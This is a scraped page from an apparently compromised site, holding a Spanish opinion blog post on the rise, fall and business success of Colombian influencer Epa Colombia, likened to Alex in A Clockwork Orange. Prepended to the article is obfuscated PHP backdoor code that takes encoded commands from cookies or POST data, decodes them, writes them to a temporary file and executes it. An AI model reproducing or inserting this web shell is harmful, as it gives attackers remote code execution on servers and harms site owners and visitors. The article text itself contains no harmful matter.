$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> Epa colombia: ascensos y descensos de una ídola. – www.interferencechannel.com

Epa colombia: ascensos y descensos de una ídola.

Fuente: https://www.colombia.com/entretenimiento/entretenimiento-y-farandula/epa-colombia-lloro-al-hablar-crecimiento-personal-314481



Daneidys Barrera fue uno de los Trending Topic del 2021. Su cotidianidad era la noticia del momento, y no por un hecho sino por muchos, pasando de la veneración colectiva al ser ídolo – símbolo de la “violencia del estado opresor”, a la abominación por su video con Uribe. A la decepción.


En lo personal admiro a esta mujer y sus conquistas, como feminista la considero una exitosa empresaria que ha saboreado la palabra empoderamiento en sus altas y en sus bajas; soy también consciente de los múltiples simbolismos que encarna su figura. Ella es símbolo del empoderamiento femenino, de la mujer luchona que sale adelante con sus aciertos y errores. Su figura encarna al ciudadano del común que quiere creer que en este país clasista y racista sí se puede salir adelante, así mismo, paralelamente y sin buscarlo, es símbolo del ciudadano dentro y fuera del sistema, casi como analogía a la figura de Alex en la Naranja mecánica de Kubrick, salvando la intencional violencia del personaje de esta película.

Fuente: https://www.el-parnasillo.com/lanaranjamecanica.htm.
El triángulo simboliza a Alex dentro y fuera del sistema, como “Epa” en su etapa “vandálica” vs. “Epa” la exitosa empresaria.

¿Por qué la analogía? en la película de Kubrick veíamos cómo había un personaje reprobable como Alex y sus Drugos haciendo estragos por la ciudad, Epa, aunque no era violenta, era reprobada por una sociedad que la veía “muy guisa, muy ñera”, la mujer anónima que estaba aprovechando sus 15 minutos de fama.

SU TRATAMIENTO – CONVERSIÓN.

Luego de exponer su opinión -que es la de muchas personas de a pie- frente al gobierno y las instituciones que este defiende (Transmilenio), su popularidad se incrementó dividida entre partidarios y detractores. Este fue el hecho que la catapultó como símbolo, que la hizo ídola. Esa que no tuvo miedo para interpretar y/o manifestar lo que las masas soñaban con hacer y decir.

Fuente: https://www.eluniversal.com.co/farandula/el-video-por-el-que-epa-colombia-fue-condenada-a-5-anos-de-carcel-EL5184987.

De los tiempos en que Daneidys se proyectaba como “la heroína del pueblo frente al estado opresor”.


Ya hecha símbolo, era necesario que el sistema la reprobara y corrigiera para que el pueblo no se sublevara. Se la acorraló y persiguió hasta la violencia económica que con experticia ejecutó Claudia López, cerrando sus peluquerías, entre otras acciones.

Se la podría haber seguido acosando, hasta que alguien recordó lo que decía Maquiavelo: si no puedes con tu enemigo, únete a él, fue entonces tras la amenaza de ir a la carcel que Daneidy realizó un video con Uribe, colocando además su publicidad en Transmilenio, entidad que en su tiempo hubiera vandalizado, transmitiéndonos con esto un mensaje contradictorio frente a sus opiniones y la sensación de alta traición a ese altar de ídolo que muchos erigieron.

Fuente: https://www.agenciapi.co/noticia/politica/razones-de-la-reunion-de-epa-colombia-con-alvaro-uribe

Al final Daneidy, como Alex, pudo decir: “Sin lugar a dudas, me había curado.”.

Fuente: https://www.yaconic.com/teorias-y-el-final-explicado-de-la-naranja-mecanica/
Fuente: https://primeralinea.com.co/millonaria-pauta-publicitaria-de-epa-colombia-y-transmilenio/ Daneidy haciendo “¿parte del sistema?”.

Por otra parte, como individuos no tenemos la oportunidad de ser redimidos, el mensaje final con todo esto se resume en otro dicho, bastante adecuado a estos tiempos corruptos: “El problema de la rosca es no estar dentro de ella”. Quedamos sin la ilusión de que una joven y exitosa mujer encarne nuestra lucha cotidiana contra un régimen que nos oprime, y han quedado muchos, también, con el desencanto de que no importa de donde vengas para luchar contra la opresión, porque al final el poder corrompe el corazón.

¿Y ESO ES TODO?

No. De esto ya han pasado 4 meses, tal vez. ¿Qué ha demostrado o qué puede observarse de Daneidy durante el tiempo restante? Pienso en ella como el alter ego de muchos, hombres y mujeres de pocos ingresos que a pesar de todo sueñan con ser como ella: tener tanta plata que la puedes botar por un helicóptero con el orgullo de saber que es plata limpia, que no tiene ese manoseo maldito del narcotráfico; tener una empresa, empleados, el carro (o los carros) de tus sueños, hacerle una casa a sus padres… ¡En fin!.

Le veo también como el alter ego de ella misma, reflejando el imaginario que una niña de extracción popular puede ver como lo exitoso: ser una mujer “buena” (o buenona), aunque eso signifique modificar su cuerpo y por ende evidenciar que las mujeres deberíamos sentirnos inconformes por como somos; provocadora, fomentando el escándalo casi que como estrategia de venta. Cabe recordar su proclamada homosexualidad, sus trinos a favor y en contra de los políticos y la política, e incluso el más reciente, en contra de la “infortunada frase” emitida por nuestra alcaldesa sobre el uso de los carros en pico y placa, que ha servido de materia prima a divertidos y variados memes.

Daneidys no deja de ser la brillante empresaria que a pesar de los problemas sale adelante sin dejarse hundir de las circunstancias y los números lo dicen:

Fuente: https://www.larepublica.co/economia/los-aprendizajes-de-epa-colombia-y-la-economia-popular-3166517 8 de mayo de 2021.

Aclaro la neutralidad de esta publicación y reitero mi admiración por esta mujer, aunque la comparación hecha en este artículo y ciertos de los comentarios aquí plasmados puedan parecer odiosos, lo que demuestra día a día, la imagen que ella vende, no es solo la de un producto de calidad y con alta demanda como sus keratinas, sino la del arquetipo exitoso e ideal del Colombiano: Una persona recursiva y berraca, echada pa’lante, que no se deja amedrentar ante los desafíos de la vida. Una mujer que se ha ganado peso por peso el título de “la reina de las keratinas”.

Fuente: https://www.elempleo.com/co/noticias/tendencias-laborales/epa-colombia-ahora-ofrece-empleo-en-su-empresa-de-keratinas-6459


Paola Rubiano.

Comments are closed.